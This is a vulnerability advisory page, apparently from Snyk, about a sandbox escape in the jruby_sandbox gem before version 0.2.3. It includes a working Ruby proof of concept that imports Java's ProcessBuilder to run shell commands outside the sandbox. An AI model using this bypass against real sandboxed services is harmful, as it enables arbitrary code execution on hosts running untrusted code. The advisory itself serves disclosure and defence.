Arbitrary Code Execution Affecting jruby_sandbox package, versions < 0.2.3

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-RUBY-JRUBYSANDBOX-20156
published 23 Apr 2014
disclosed 23 Apr 2014
credit joernchen

Report a new vulnerability Found a mistake?

Introduced: 23 Apr 2014

CWE-94 Open this link in a new tab

Overview

jruby_sandbox is a version of _why's Freaky Freaky Sandbox for JRuby. Affected versions of this gem are vulnerable to sandbox bypassing for arbitrary code execution while importing Java classes.

Details

jruby_sandbox aims to allow safe execution of user given Ruby code within a JRuby [0] runtime. However via import of Java classes it is possible to circumvent those protections and execute arbitrary code outside the sandboxed environment.

Example:

require 'sandbox'
sand = Sandbox.safe
sand.activate!

begin
  sand.eval("print id")
rescue Exception => e
  puts "fail via Ruby ;)"
end
puts "Now for some Java"
sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")
sand.eval("Kernel.send :java_import, 'java.util.Scanner'")
sand.eval("s = Java::java.util.Scanner.new( " +
          "Java::java.lang.ProcessBuilder.new('sh','-c','id')" +
          ".start.getInputStream  ).useDelimiter(&quot;\x00&quot;).next")
sand.eval("print s")

References

CVSS Scores

version 3.1

Attack Vector (AV)

Network
Attack Complexity (AC)

High
Privileges Required (PR)

None
User Interaction (UI)

None

Scope (S)

Unchanged

Confidentiality (C)

High
Integrity (I)

Low
Availability (A)

Low

Arbitrary Code Execution Affecting jruby_sandbox package, versions < 0.2.3

Severity

CVSS assessment made by Snyk's Security Team

Introduced: 23 Apr 2014

Overview

Details

References

CVSS Scores

Snyk